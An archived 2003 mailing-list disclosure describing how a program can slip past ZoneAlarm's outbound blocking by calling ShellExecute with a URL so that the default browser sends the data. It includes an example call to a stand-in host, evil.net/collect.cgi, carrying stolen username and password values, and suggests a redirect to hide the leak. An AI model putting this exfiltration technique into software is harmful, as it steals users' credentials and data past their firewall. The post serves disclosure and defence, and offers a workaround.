Bypassing ZoneAlarm (limited)

From: acehat_private
Date: Sun Jun 22 2003 - 23:12:46 PDT

Next message: Knud Erik Højgaard: "[Full-Disclosure] gid bin from /usr/ports/korean/elm (FreeBSD)"

Previous message: dong-h0un U: "GNATS (The GNU bug-tracking system) multiple buffer overflow vulnerabilities."
Next in thread: Dan Harkless: "Re: Bypassing ZoneAlarm (limited)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Hi everyone. I don't know if this is a new issue but it is a simple way to bypass (in some limited form) ZoneAlarm's Application level Internet access blocking. Windows dll shell32.dll exports a well known and documented function called ShellExecute. From Win32 Programmer's refference: >HINSTANCE ShellExecute( > HWND hwnd, // handle to parent window > LPCTSTR lpOperation, // pointer to string that specifies > // operation to perform > LPCTSTR lpFile, // pointer to filename or folder name string > LPCTSTR lpParameters, // pointer to string that specifies > //executable-file parameters > LPCTSTR lpDirectory, // pointer to string that specifies default directory > INT nShowCmd // whether file is shown when opened > ); When the lpFile parameter is an Internet url, windows invokes Internet Explorer (or more accurately - the default web browser), which in 99% of the cases is allowed to access Internet, with that url. Example: ShellExecute( 0, "open", "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password" 0, 0, SW_HIDE //This doesn't work. //I think it is supposed to hide the window but ... ); The collect.cgi (after storing stolen_username/stolen_password) could redirect the user for example to windowsupdate.microsoft.com, so that many users will not even suspect anything. The info leaked is limited by the maximum allowed url length, but that could be more than enough for a malicious application to send some username/password/cookie/cc_number info to malicious server. This was tested on ZoneAlarm 3.1.395 (freeware) but i guess that all versions can be tricked if the user has granted access to his default web browser by default (very likely) VENDOR STATUS: I thing that this is flaw in the core design of ZoneAlarm (and/or Windows) and don't see a way it can be fixed. WORKAROUND: Do not allow ANY application to access Internet by default and review each request separately. Any comments are wellcome. aceh

Next message: Knud Erik Højgaard: "[Full-Disclosure] gid bin from /usr/ports/korean/elm (FreeBSD)"
Previous message: dong-h0un U: "GNATS (The GNU bug-tracking system) multiple buffer overflow vulnerabilities."
Next in thread: Dan Harkless: "Re: Bypassing ZoneAlarm (limited)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jun 23 2003 - 11:32:36 PDT